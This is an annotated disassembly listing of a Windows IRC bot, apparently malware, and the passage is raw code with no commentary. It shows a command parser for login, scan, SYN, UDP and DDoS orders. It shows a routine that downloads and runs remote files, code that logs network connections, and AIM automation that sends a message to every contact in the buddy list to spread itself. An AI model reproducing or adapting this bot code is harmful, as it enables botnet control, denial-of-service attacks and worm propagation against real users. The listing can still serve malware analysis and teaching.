cmp eax, 1
jnz loc_404C3D
mov eax, [ebp-34h]
push dword ptr [eax+0Ch]
call dword_401164 ; inet_ntoa
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_404BCC
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404BCC: ; CODE XREF: MEW:00404BC5�j
push 10h
push dword ptr [ebp-0Ch]
lea eax, [ebp-5Ch]
push eax
call dword_4010BC ; lstrcpynA
mov eax, [ebp-34h]
push dword ptr [eax+10h]
call dword_401164 ; inet_ntoa
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_404BF5
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404BF5: ; CODE XREF: MEW:00404BEE�j
push 10h
push dword ptr [ebp-0Ch]
lea eax, [ebp-24h]
push eax
call dword_4010BC ; lstrcpynA
push dword ptr [ebp-1E8h]
movzx eax, word ptr [ebp-28h]
push eax
lea eax, [ebp-24h]
push eax
movzx eax, word ptr [ebp-4]
push eax
lea eax, [ebp-5Ch]
push eax
push offset a_16sHu_16sHu_2 ; "[%.16s:%hu->%.16s:%hu] \"%.256s\""
lea eax, [ebp-1E0h]
push eax
call dword_401104 ; wsprintfA
add esp, 1Ch
lea eax, [ebp-1E0h]
push eax
call sub_402C53
loc_404C3D: ; CODE XREF: MEW:00404BAC�j
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404C42: ; CODE XREF: MEW:004049DF�j
push dword ptr [ebp-48h]
call dword_40108C ; GlobalFree
xor eax, eax
locret_404C4D: ; CODE XREF: MEW:00404936�j
; MEW:0040495A�j ...
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C51 proc near ; CODE XREF: MEW:00404BA4�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
mov [ebp+var_38], offset a_332? ; "*:*.* 332 * #* :?* *"
mov [ebp+var_34], offset aPrivmsg? ; "*PRIVMSG * :?* *"
mov [ebp+var_30], offset a?login ; "* :?login * *"
mov [ebp+var_2C], offset a?set ; "* :?set * * *"
mov [ebp+var_28], offset a?Scan ; "* :?*scan* *"
mov [ebp+var_24], offset a?Syn ; "* :?*syn* *"
mov [ebp+var_20], offset a?Udp ; "* :?*udp* *"
mov [ebp+var_1C], offset a?Ddos ; "* :?*ddos* *"
mov [ebp+var_18], offset aUser? ; "USER ?* "
mov [ebp+var_14], offset aPass? ; "PASS ?* "
mov [ebp+var_10], offset aOper?? ; "OPER ?* ?* *"
mov [ebp+var_C], offset aJoin ; "JOIN #* *"
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_404CBC
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_404C51:loc_404CDF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CBC: ; CODE XREF: sub_404C51+62�j
mov eax, [ebp+var_4]
cmp [ebp+eax*4+var_38], 0
jz short loc_404CE1
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_38]
call sub_403E5B
cmp eax, 1
jnz short loc_404CDF
xor eax, eax
inc eax
jmp short locret_404CE3
; ---------------------------------------------------------------------------
loc_404CDF: ; CODE XREF: sub_404C51+87�j
jmp short loc_404CB5
; ---------------------------------------------------------------------------
loc_404CE1: ; CODE XREF: sub_404C51+73�j
xor eax, eax
locret_404CE3: ; CODE XREF: sub_404C51+8C�j
leave
retn 4
sub_404C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CE7 proc near ; CODE XREF: sub_403062+316�p
var_3AC = dword ptr -3ACh
var_3A8 = byte ptr -3A8h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_110 = byte ptr -110h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 218h
and [ebp+var_218], 0
mov eax, [ebp+arg_4]
mov [ebp+var_214], eax
mov eax, [ebp+arg_8]
mov [ebp+var_210], eax
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
call dword_4010BC ; lstrcpynA
lea eax, [ebp+var_108]
push eax
push 0
push offset byte_401C65
push offset a_ ; "."
call dword_401094 ; GetTempFileNameA
push 0
push 0
lea eax, [ebp+var_218]
push eax
push offset loc_404D6C
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_404D68
loc_404D55: ; CODE XREF: sub_404CE7+7F�j
cmp [ebp+var_218], 0
jnz short locret_404D68
push 8
call dword_4010DC ; Sleep
jmp short loc_404D55
; ---------------------------------------------------------------------------
locret_404D68: ; CODE XREF: sub_404CE7+6C�j
; sub_404CE7+75�j
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_404D6C: ; DATA XREF: sub_404CE7+5B�o
push ebp
mov ebp, esp
sub esp, 3ACh
push offset aUrlmon_dll ; "urlmon.dll"
call dword_401068 ; LoadLibraryA
mov [ebp+var_224], eax
cmp [ebp+var_224], 0
jz short loc_404DAF
push offset aUrldownloadtof ; "URLDownloadToFileA"
push [ebp+var_224]
call dword_401064 ; GetProcAddress
mov [ebp+var_3AC], eax
cmp [ebp+var_3AC], 0
jnz short loc_404DB6
loc_404DAF: ; CODE XREF: sub_404CE7+A6�j
xor eax, eax
jmp locret_404EFE
; ---------------------------------------------------------------------------
loc_404DB6: ; CODE XREF: sub_404CE7+C6�j
push 214h
push [ebp+arg_0]
lea eax, [ebp+var_220]
push eax
call sub_40392B
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
call dword_40106C ; GetCurrentThreadId
mov [ebp+var_4], eax
cmp [ebp+var_218], 0
jnz short loc_404E17
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_4]
push offset aDl08x_180sTo_1 ; "[dl:%08x] %.180s to %.180s"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404E17: ; CODE XREF: sub_404CE7+FC�j
push 0
push 0
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_214]
push eax
push 0
call [ebp+var_3AC]
test eax, eax
jnz loc_404ECF
push offset dword_4015F0
push offset aD ; "D"
push 0
push 0
push 28h
push 0
push 0
push 0
lea eax, [ebp+var_110]
push eax
push 0
call dword_4010A8 ; CreateProcessA
cmp eax, 1
jnz short loc_404EA0
cmp [ebp+var_218], 0
jnz short loc_404E90
push [ebp+var_4]
push offset aDl08x ; "[dl:%08x] :)"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404E90: ; CODE XREF: sub_404CE7+183�j
cmp [ebp+var_21C], 1
jnz short loc_404E9E
call sub_4027AF
loc_404E9E: ; CODE XREF: sub_404CE7+1B0�j
jmp short loc_404ECD
; ---------------------------------------------------------------------------
loc_404EA0: ; CODE XREF: sub_404CE7+17A�j
cmp [ebp+var_218], 0
jnz short loc_404ECD
push [ebp+var_4]
push offset aDl08xExec ; "[dl:%08x] :( exec"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404ECD: ; CODE XREF: sub_404CE7:loc_404E9E�j
; sub_404CE7+1C0�j
jmp short loc_404EFC
; ---------------------------------------------------------------------------
loc_404ECF: ; CODE XREF: sub_404CE7+14C�j
cmp [ebp+var_218], 0
jnz short loc_404EFC
push [ebp+var_4]
push offset aDl08xDl ; "[dl:%08x] :( dl"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404EFC: ; CODE XREF: sub_404CE7:loc_404ECD�j
; sub_404CE7+1EF�j
xor eax, eax
locret_404EFE: ; CODE XREF: sub_404CE7+CA�j
leave
retn 4
sub_404CE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F02 proc near ; CODE XREF: sub_403062+2C2�p
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_C = word ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
cmp dword_40168C, 0
jnz short loc_404F16
jmp locret_404FBB
; ---------------------------------------------------------------------------
loc_404F16: ; CODE XREF: sub_404F02+D�j
push 20h
push [ebp+arg_0]
call sub_40395A
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404F2E
jmp locret_404FBB
; ---------------------------------------------------------------------------
loc_404F2E: ; CODE XREF: sub_404F02+25�j
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 40h
push [ebp+arg_0]
lea eax, [ebp+var_4C]
push eax
call dword_4010BC ; lstrcpynA
and [ebp+var_C], 0
jmp short loc_404F58
; ---------------------------------------------------------------------------
loc_404F51: ; CODE XREF: sub_404F02+81�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F58: ; CODE XREF: sub_404F02+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_404F85
movzx eax, [ebp+var_C]
imul eax, 0Ah
mov [ebp+var_C], ax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
sub eax, 30h
movzx eax, ax
movzx ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], cx
jmp short loc_404F51
; ---------------------------------------------------------------------------
loc_404F85: ; CODE XREF: sub_404F02+5E�j
and [ebp+var_50], 0
and dword_40168C, 0
push 0
push 0
lea eax, [ebp+var_50]
push eax
push offset loc_40501F
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_404FBB
loc_404FAB: ; CODE XREF: sub_404F02+B7�j
cmp [ebp+var_50], 0
jnz short locret_404FBB
push 8
call dword_4010DC ; Sleep
jmp short loc_404FAB
; ---------------------------------------------------------------------------
locret_404FBB: ; CODE XREF: sub_404F02+F�j
; sub_404F02+27�j ...
leave
retn 4
sub_404F02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FBF proc near ; CODE XREF: sub_403062:loc_40332E�p
push ebp
mov ebp, esp
mov dword_40168C, 1
pop ebp
retn
sub_404FBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FCE proc near ; CODE XREF: sub_403062+2E8�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
cmp dword_40168C, 1
jnz short loc_404FE2
jmp short locret_40501B
; ---------------------------------------------------------------------------
loc_404FE2: ; CODE XREF: sub_404FCE+10�j
push [ebp+arg_0]
push offset a_500s ; "%.500s\n"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp+var_204], eax
push 0
push [ebp+var_204]
lea eax, [ebp+var_200]
push eax
push dword_4014D0
call dword_401130 ; send
locret_40501B: ; CODE XREF: sub_404FCE+12�j
leave
retn 4
sub_404FCE endp
; ---------------------------------------------------------------------------
loc_40501F: ; DATA XREF: sub_404F02+96�o
push ebp
mov ebp, esp
sub esp, 5B0h
push esi
push edi
mov esi, [ebp+8]
push 11h
pop ecx
lea edi, [ebp-598h]
rep movsd
movsw
mov eax, [ebp+8]
mov dword ptr [eax], 1
call dword_4010A4 ; GetTickCount
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
and eax, 3
add eax, 5
mov [ebp-54Ch], eax
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
and eax, 3
add eax, 4
mov [ebp-4], eax
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
and eax, 3
add eax, 4
mov [ebp-28h], eax
call dword_4010A4 ; GetTickCount
mov [ebp-5A0h], eax
and dword ptr [ebp-24h], 0
jmp short loc_4050B4
; ---------------------------------------------------------------------------
loc_4050AD: ; CODE XREF: MEW:004050F8�j
mov eax, [ebp-24h]
inc eax
mov [ebp-24h], eax
loc_4050B4: ; CODE XREF: MEW:004050AB�j
mov eax, [ebp-24h]
cmp eax, [ebp-54Ch]
jnb short loc_4050FA
mov eax, [ebp-5A0h]
xor eax, 96F050F2h
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp-24h]
mov [ebp+eax-548h], dl
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
jmp short loc_4050AD
; ---------------------------------------------------------------------------
loc_4050FA: ; CODE XREF: MEW:004050BD�j
mov eax, [ebp-24h]
mov byte ptr [ebp+eax-548h], 0
and dword ptr [ebp-24h], 0
jmp short loc_405112
; ---------------------------------------------------------------------------
loc_40510B: ; CODE XREF: MEW:00405153�j
mov eax, [ebp-24h]
inc eax
mov [ebp-24h], eax
loc_405112: ; CODE XREF: MEW:00405109�j
mov eax, [ebp-24h]
cmp eax, [ebp-4]
jnb short loc_405155
mov eax, [ebp-5A0h]
xor eax, 78D6BA83h
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp-24h]
mov [ebp+eax-5B0h], dl
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
jmp short loc_40510B
; ---------------------------------------------------------------------------
loc_405155: ; CODE XREF: MEW:00405118�j
mov eax, [ebp-24h]
mov byte ptr [ebp+eax-5B0h], 0
and dword ptr [ebp-24h], 0
jmp short loc_40516D
; ---------------------------------------------------------------------------
loc_405166: ; CODE XREF: MEW:004051AE�j
mov eax, [ebp-24h]
inc eax
mov [ebp-24h], eax
loc_40516D: ; CODE XREF: MEW:00405164�j
mov eax, [ebp-24h]
cmp eax, [ebp-28h]
jnb short loc_4051B0
mov eax, [ebp-5A0h]
xor eax, 0D9503521h
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp-24h]
mov [ebp+eax-138h], dl
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
jmp short loc_405166
; ---------------------------------------------------------------------------
loc_4051B0: ; CODE XREF: MEW:00405173�j
mov eax, [ebp-24h]
mov byte ptr [ebp+eax-138h], 0
push 6
push 1
push 2
call dword_401160 ; socket
mov dword_4014D0, eax
cmp dword_4014D0, 0FFFFFFFFh
jnz short loc_4051DC
xor eax, eax
jmp loc_40538E
; ---------------------------------------------------------------------------
loc_4051DC: ; CODE XREF: MEW:004051D3�j
mov word ptr [ebp-18h], 2
push dword ptr [ebp-554h]
call dword_40110C ; ntohs
mov [ebp-16h], ax
lea eax, [ebp-594h]
push eax
call dword_40111C ; inet_addr
mov [ebp-14h], eax
push 10h
lea eax, [ebp-18h]
push eax
push dword_4014D0
call dword_40112C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_405220
xor eax, eax
jmp loc_40538E
; ---------------------------------------------------------------------------
loc_405220: ; CODE XREF: MEW:00405217�j
lea eax, [ebp-138h]
push eax
lea eax, [ebp-594h]
push eax
lea eax, [ebp-5B0h]
push eax
push offset aUser_16s_16s_1 ; "USER %.16s \"\" \"%.16s\" %.16s\n"
lea eax, [ebp-128h]
push eax
call dword_401104 ; wsprintfA
add esp, 14h
mov [ebp-550h], eax
push 0
push dword ptr [ebp-550h]
lea eax, [ebp-128h]
push eax
push dword_4014D0
call dword_401130 ; send
lea eax, [ebp-548h]
push eax
push offset aNick_16s ; "NICK %.16s\n"
lea eax, [ebp-128h]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp-550h], eax
push 0
push dword ptr [ebp-550h]
lea eax, [ebp-128h]
push eax
push dword_4014D0
call dword_401130 ; send
and dword ptr [ebp-8], 0
loc_4052AC: ; CODE XREF: MEW:loc_40537B�j
cmp dword_40168C, 0
jnz loc_405380
push 0
mov eax, 400h
sub eax, [ebp-8]
push eax
mov eax, [ebp-8]
lea eax, [ebp+eax-538h]
push eax
push dword_4014D0
call dword_40113C ; recv
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0
jle loc_405380
mov eax, [ebp-8]
add eax, [ebp-1Ch]
mov [ebp-8], eax
mov eax, [ebp-8]
mov byte ptr [ebp+eax-538h], 0
lea eax, [ebp-538h]
mov [ebp-59Ch], eax
loc_405308: ; CODE XREF: MEW:loc_405375�j
mov eax, [ebp-59Ch]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_405377
push 0Dh
push dword ptr [ebp-59Ch]
call sub_40395A
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_405349
mov eax, [ebp-20h]
mov byte ptr [eax], 0
push dword ptr [ebp-59Ch]
call sub_405394
mov eax, [ebp-20h]
inc eax
inc eax
mov [ebp-59Ch], eax
jmp short loc_405375
; ---------------------------------------------------------------------------
loc_405349: ; CODE XREF: MEW:00405329�j
mov eax, [ebp-8]
lea eax, [ebp+eax-538h]
sub eax, [ebp-59Ch]
mov [ebp-8], eax
mov eax, [ebp-8]
inc eax
push eax
push dword ptr [ebp-59Ch]
lea eax, [ebp-538h]
push eax
call sub_40392B
jmp short loc_40537B
; ---------------------------------------------------------------------------
loc_405375: ; CODE XREF: MEW:00405347�j
jmp short loc_405308
; ---------------------------------------------------------------------------
loc_405377: ; CODE XREF: MEW:00405313�j
and dword ptr [ebp-8], 0
loc_40537B: ; CODE XREF: MEW:00405373�j
jmp loc_4052AC
; ---------------------------------------------------------------------------
loc_405380: ; CODE XREF: MEW:004052B3�j
; MEW:004052E2�j
push dword_4014D0
call dword_401140 ; closesocket
xor eax, eax
loc_40538E: ; CODE XREF: MEW:004051D7�j
; MEW:0040521B�j
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405394 proc near ; CODE XREF: MEW:00405337�p
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_4053D1
push 20h
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40395A
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4053C2
jmp locret_40553B
; ---------------------------------------------------------------------------
loc_4053C2: ; CODE XREF: sub_405394+27�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp short loc_4053D7
; ---------------------------------------------------------------------------
loc_4053D1: ; CODE XREF: sub_405394+12�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
loc_4053D7: ; CODE XREF: sub_405394+3B�j
push 20h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4053F1
jmp locret_40553B
; ---------------------------------------------------------------------------
db 0EBh
db 0Dh
; ---------------------------------------------------------------------------
loc_4053F1: ; CODE XREF: sub_405394+54�j
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push offset aPing ; "PING"
push [ebp+var_8]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_40544E
push [ebp+var_4]
push offset aPong_500s ; "PONG %.500s\r\n"
lea eax, [ebp+var_208]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp+var_20C], eax
push 0
push [ebp+var_20C]
lea eax, [ebp+var_208]
push eax
push dword_4014D0
call dword_401130 ; send
jmp locret_40553B
; ---------------------------------------------------------------------------
loc_40544E: ; CODE XREF: sub_405394+7A�j
push offset a433 ; "433"
push [ebp+var_8]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz locret_40553B
call dword_4010A4 ; GetTickCount
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
and eax, 3
add eax, 5
mov [ebp+var_224], eax
call dword_4010A4 ; GetTickCount
mov [ebp+var_228], eax
and [ebp+var_210], 0
jmp short loc_4054A4
; ---------------------------------------------------------------------------
loc_405497: ; CODE XREF: sub_405394+15A�j
mov eax, [ebp+var_210]
inc eax
mov [ebp+var_210], eax
loc_4054A4: ; CODE XREF: sub_405394+101�j
mov eax, [ebp+var_210]
cmp eax, [ebp+var_224]
jnb short loc_4054F0
mov eax, [ebp+var_228]
xor eax, 54287D75h
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp+var_210]
mov [ebp+eax+var_220], dl
mov eax, [ebp+var_228]
shr eax, 1
mov [ebp+var_228], eax
jmp short loc_405497
; ---------------------------------------------------------------------------
loc_4054F0: ; CODE XREF: sub_405394+11C�j
mov eax, [ebp+var_210]
mov [ebp+eax+var_220], 0
lea eax, [ebp+var_220]
push eax
push offset aNick_16s ; "NICK %.16s\n"
lea eax, [ebp+var_208]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp+var_20C], eax
push 0
push [ebp+var_20C]
lea eax, [ebp+var_208]
push eax
push dword_4014D0
call dword_401130 ; send
locret_40553B: ; CODE XREF: sub_405394+29�j
; sub_405394+56�j ...
leave
retn 4
sub_405394 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40553F proc near ; CODE XREF: sub_403062+2A6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push 0
push offset a_oscar_statusn ; "_Oscar_StatusNotify"
call dword_4010EC ; FindWindowA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_405560
jmp locret_405724
; ---------------------------------------------------------------------------
loc_405560: ; CODE XREF: sub_40553F+1A�j
push 0
push 4E23h
push 111h
push [ebp+var_8]
call dword_4010FC ; SendMessageA
push 0
push [ebp+var_8]
call dword_4010F8 ; GetWindowThreadProcessId
mov [ebp+var_1C], eax
and [ebp+var_14], 0
loc_405587: ; CODE XREF: sub_40553F:loc_4055FB�j
push 0
push offset a32770 ; "#32770"
push [ebp+var_14]
push 0
call dword_4010F4 ; FindWindowExA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4055A7
jmp locret_405724
; ---------------------------------------------------------------------------
loc_4055A7: ; CODE XREF: sub_40553F+61�j
push 0
push [ebp+var_14]
call dword_4010F8 ; GetWindowThreadProcessId
cmp eax, [ebp+var_1C]
jnz short loc_4055FB
push 0
push offset a32770 ; "#32770"
push 0
push [ebp+var_14]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4055D7
jmp locret_405724
; ---------------------------------------------------------------------------
loc_4055D7: ; CODE XREF: sub_40553F+91�j
push 0
push offset a_oscar_tree ; "_Oscar_Tree"
push 0
push [ebp+var_C]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_4055F9
jmp locret_405724
; ---------------------------------------------------------------------------
db 0EBh
db 2
; ---------------------------------------------------------------------------
loc_4055F9: ; CODE XREF: sub_40553F+B1�j
jmp short loc_4055FD
; ---------------------------------------------------------------------------
loc_4055FB: ; CODE XREF: sub_40553F+76�j
jmp short loc_405587
; ---------------------------------------------------------------------------
loc_4055FD: ; CODE XREF: sub_40553F:loc_4055F9�j
push 0
push 0
push 18Bh
push [ebp+var_18]
call dword_4010FC ; SendMessageA
mov [ebp+var_10], eax
push 0
push [ebp+var_10]
push 186h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 25h
push 100h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 25h
push 101h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 0
push 18Bh
push [ebp+var_18]
call dword_4010FC ; SendMessageA
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
dec eax
dec eax
mov [ebp+var_4], eax
jmp short loc_40566F
; ---------------------------------------------------------------------------
loc_405668: ; CODE XREF: sub_40553F+16D�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
loc_40566F: ; CODE XREF: sub_40553F+127�j
cmp [ebp+var_4], 0
jl short loc_4056AE
push 0
push [ebp+var_4]
push 186h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 27h
push 100h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 27h
push 101h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
jmp short loc_405668
; ---------------------------------------------------------------------------
loc_4056AE: ; CODE XREF: sub_40553F+134�j
push 0
push 0
push 18Bh
push [ebp+var_18]
call dword_4010FC ; SendMessageA
mov [ebp+var_10], eax
and [ebp+var_4], 0
jmp short loc_4056D0
; ---------------------------------------------------------------------------
loc_4056C9: ; CODE XREF: sub_40553F+1E3�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4056D0: ; CODE XREF: sub_40553F+188�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jge short locret_405724
push 0
push [ebp+var_4]
push 186h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 20h
push 100h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 20h
push 101h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push [ebp+arg_0]
call sub_405728
push 7D0h
call dword_4010DC ; Sleep
jmp short loc_4056C9
; ---------------------------------------------------------------------------
locret_405724: ; CODE XREF: sub_40553F+1C�j
; sub_40553F+63�j ...
leave
retn 4
sub_40553F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405728 proc near ; CODE XREF: sub_40553F+1D3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
loc_40572E: ; CODE XREF: sub_405728+E9�j
push offset aInstantMessage ; "Instant Message"
push offset aAim_imessage ; "AIM_IMessage"
push 0
push 0
call dword_4010F4 ; FindWindowExA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz locret_405816
and [ebp+var_C], 0
loc_405753: ; CODE XREF: sub_405728:loc_4057AA�j
push 0
push offset aWndate32class ; "WndAte32Class"
push [ebp+var_C]
push [ebp+var_4]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4057AC
push 0
push offset aCbclass ; "CBClass"
push 0
push [ebp+var_C]
call dword_4010F4 ; FindWindowExA
test eax, eax
jz short loc_4057AA
push 0
push offset aAte32class ; "Ate32Class"
push 0
push [ebp+var_C]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_10], eax
push [ebp+arg_0]
push 0
push 0Ch
push [ebp+var_10]
call dword_4010FC ; SendMessageA
loc_4057AA: ; CODE XREF: sub_405728+5B�j
jmp short loc_405753
; ---------------------------------------------------------------------------
loc_4057AC: ; CODE XREF: sub_405728+45�j
and [ebp+var_8], 0
loc_4057B0: ; CODE XREF: sub_405728:loc_405800�j
push 0
push offset a_oscar_iconbtn ; "_Oscar_IconBtn"
push [ebp+var_8]
push [ebp+var_4]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_405802
push [ebp+var_8]
call dword_401100 ; GetMenu
cmp eax, 199h
jnz short loc_405800
push 0
push 0
push 201h
push [ebp+var_8]
call dword_4010FC ; SendMessageA
push 0
push 0
push 202h
push [ebp+var_8]
call dword_4010FC ; SendMessageA
loc_405800: ; CODE XREF: sub_405728+B2�j
jmp short loc_4057B0
; ---------------------------------------------------------------------------
loc_405802: ; CODE XREF: sub_405728+A2�j
push 0
push 0
push 10h
push [ebp+var_4]
call dword_4010FC ; SendMessageA
jmp loc_40572E
; ---------------------------------------------------------------------------
locret_405816: ; CODE XREF: sub_405728+21�j
leave
retn 4
sub_405728 endp
; ---------------------------------------------------------------------------
loc_40581A: ; DATA XREF: sub_403B95+2A9�o
push ebp
mov ebp, esp
sub esp, 4Ch
push dword ptr [ebp+8]
call sub_40587E
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz short loc_405878
cmp dword_40167C, 0
jnz short loc_405878
cmp dword ptr [ebp-4], 1
jnz short loc_405849
mov dword ptr [ebp-4Ch], offset dword_402598
jmp short loc_405850
; ---------------------------------------------------------------------------
loc_405849: ; CODE XREF: MEW:0040583E�j
mov dword ptr [ebp-4Ch], offset dword_402594
loc_405850: ; CODE XREF: MEW:00405847�j
push dword ptr [ebp-4Ch]
